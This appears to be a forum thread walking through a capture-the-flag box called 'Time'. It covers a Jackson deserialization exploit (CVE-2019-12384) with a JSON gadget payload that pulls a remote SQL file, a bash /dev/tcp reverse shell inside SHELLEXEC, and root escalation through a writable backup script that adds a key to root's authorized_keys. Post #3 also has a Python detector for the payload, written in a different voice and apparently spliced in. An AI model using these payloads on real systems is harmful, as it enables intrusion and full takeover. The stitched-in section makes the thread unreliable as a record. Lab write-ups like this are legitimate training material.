TUTORIAL Time Tutorial
by southerndarkness - October 25, 2020 at 02:55 AM
#1
- port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas; you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root
#2
(October 25, 2020 at 02:55 AM)southerndarkness Wrote: - port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas; you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root


Can't replace the URL in the payload.
Getting error: Unexpected character (''' (code 39)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

(October 25, 2020 at 08:15 AM)Zxelex Wrote:
(October 25, 2020 at 02:55 AM)southerndarkness Wrote: - port scan to reveal ports 22, 80
- port 80 shows form that acts as formatter/validator
- entering "test" and selecting validator (betas) shows the processor used - fasterxml/jackson
- CVE-2019-12384 (https://github.com/jas502n/CVE-2019-12384)
- create and serve a local sql file that shellexec's a reverse shell back to you
- in the form, pass in json that downloads the sql file you created (see the repo for the payload)
- as user, enumerate with linpeas; you'll see timer_backup.sh is writable - overwrite this file to put your public key in root's authorized keys
- ssh in as root


Can't replace the URL in the payload.
Getting error: Unexpected character (''' (code 39)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

Can you post the payload that worked for you? That would be helpful.
#3
OK, I will explain.

So in the public exploit they do it on localhost, so the request for them is like:
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us, what we need to put in the validator is:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave Java errors.

-------------------------------------------------------------------------------

Also, in the inject.sql, instead of the "id" command we can put a bash reverse shell.

The one that worked perfectly is:
bash -i >& /dev/tcp/MY_IP/9999 0>&1

So the last lines of inject.sql
should look like:

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.
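A defender-side check for the input discussed in this post, added here as an example and not code from the thread or from the CVE repo: it parses a JSON document handed to a validator like this one and flags the Jackson default-typing shape `["fqcn", {...}]`, the logback gadget class, and an H2 JDBC URL carrying `INIT=RUNSCRIPT`. The sample documents (including the 192.0.2.10 documentation address) are constructed, and the gadget class list is illustrative, not exhaustive.

```python
import json
import re

# Gadget class named in the public CVE-2019-12384 write-ups; illustrative, not exhaustive.
GADGET_CLASSES = {"ch.qos.logback.core.db.DriverManagerConnectionSource"}

# Fully qualified Java class name: the shape of a Jackson default-typing hint.
JAVA_FQCN_RE = re.compile(r"[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+")

# H2 connection option that runs a SQL script (local or remote) at connect time.
H2_RUNSCRIPT_RE = re.compile(r"INIT\s*=\s*RUNSCRIPT\s+FROM", re.IGNORECASE)


def analyse(payload: str) -> list:
    """Return the findings for one JSON document given to the validator (empty = nothing suspicious)."""
    findings = []
    try:
        doc = json.loads(payload)
    except json.JSONDecodeError as exc:
        # The shell-escaped form from the repo lands here: the backslashes are not JSON.
        return ["not valid JSON: " + exc.msg]
    # Jackson default typing serialises a polymorphic bean as ["fqcn", {properties}].
    if not (isinstance(doc, list) and len(doc) == 2
            and isinstance(doc[0], str) and isinstance(doc[1], dict)):
        return findings
    cls, props = doc
    if cls in GADGET_CLASSES:
        findings.append("known gadget class: " + cls)
    elif JAVA_FQCN_RE.fullmatch(cls):
        findings.append("polymorphic type hint: " + cls)
    for key, value in props.items():
        if isinstance(value, str) and value.lower().startswith("jdbc:"):
            findings.append("JDBC URL in property '%s'" % key)
            if H2_RUNSCRIPT_RE.search(value):
                findings.append("H2 INIT=RUNSCRIPT in JDBC URL")
    return findings


# Constructed samples: a benign document, the thread's payload with a documentation
# address (192.0.2.10) in place of the listener host, and the shell-escaped repo form.
SAMPLE_BENIGN = '{"junk":"junk"}'
SAMPLE_GADGET = ('["ch.qos.logback.core.db.DriverManagerConnectionSource", '
                 '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
                 "INIT=RUNSCRIPT FROM 'http://192.0.2.10:8000/inject.sql'\"}]")
SAMPLE_ESCAPED = r'[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]'

if __name__ == "__main__":
    for name, sample in [("benign", SAMPLE_BENIGN), ("gadget", SAMPLE_GADGET), ("escaped", SAMPLE_ESCAPED)]:
        print(name, analyse(sample) or ["clean"])
```

The escaped sample shows why the repo's command-line form fails in the web form: once the backslashes are outside a shell, the document is no longer valid JSON, which is what the parser error in post #2 reports.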
#4
(October 25, 2020 at 12:12 PM)chernakotka Wrote: OK, I will explain.

So in the public exploit they do it on localhost, so the request for them is like:
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us, what we need to put in the validator is:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave Java errors.

-------------------------------------------------------------------------------

Also, in the inject.sql, instead of the "id" command we can put a bash reverse shell.

The one that worked perfectly is:
bash -i >& /dev/tcp/MY_IP/9999 0>&1

So the last lines of inject.sql
should look like:

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.

This ^^^
The payload in the repo is escaped. Removing the backslashes and putting them in the form will get it to download your sql.
#5
(October 25, 2020 at 12:12 PM)chernakotka Wrote: OK, I will explain.

So in the public exploit they do it on localhost, so the request for them is like:
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us, what we need to put in the validator is:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave Java errors.

-------------------------------------------------------------------------------

Also, in the inject.sql, instead of the "id" command we can put a bash reverse shell.

The one that worked perfectly is:
bash -i >& /dev/tcp/MY_IP/9999 0>&1

So the last lines of inject.sql
should look like:

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.


Thanks man, it worked for me, and nice explanation.

(October 25, 2020 at 10:30 PM)southerndarkness Wrote:
(October 25, 2020 at 12:12 PM)chernakotka Wrote: OK, I will explain.

So in the public exploit they do it on localhost, so the request for them is like:
jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"

----------------------------------------------------------------------------------------------------
For us, what we need to put in the validator is:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://YOUR_IP:8000/inject.sql'"}]

I had to remove the "\" because they gave Java errors.

-------------------------------------------------------------------------------

Also, in the inject.sql, instead of the "id" command we can put a bash reverse shell.

The one that worked perfectly is:
bash -i >& /dev/tcp/MY_IP/9999 0>&1

So the last lines of inject.sql
should look like:

CALL SHELLEXEC('bash -i >& /dev/tcp/MY_IP/9999 0>&1')

Then you will get a shell as the user.

This ^^^
The payload in the repo is escaped. Removing the backslashes and putting them in the form will get it to download your sql.

Thanks man, love your mini-writeup on the box, directly on point.
#6
How did you find the GitHub CVE?
#7
(October 26, 2020 at 11:34 AM)Saexlean Wrote: How did you find the GitHub CVE?

Because when you go to the website it says JSON beautifier. So it expects us to give it JSON format.
And you see it has 2 options: beautify and validate.
So if you put in the validator, let's say, a JSON
{"junk":"junk"} it says

Validation failed: Unhandled Java exception:....and so on

And if you see, it errors on the fasterxml, so when you google, in the end you will end up with that article
https://blog.doyensec.com/2019/07/22/jac...dgets.html

and the CVE.
#8
Nicely done ...

The cron job was killing my root shell... the overwrite of root's pub key is a much better option!
#9
Can you explain a bit more in-depth about the 2nd process?
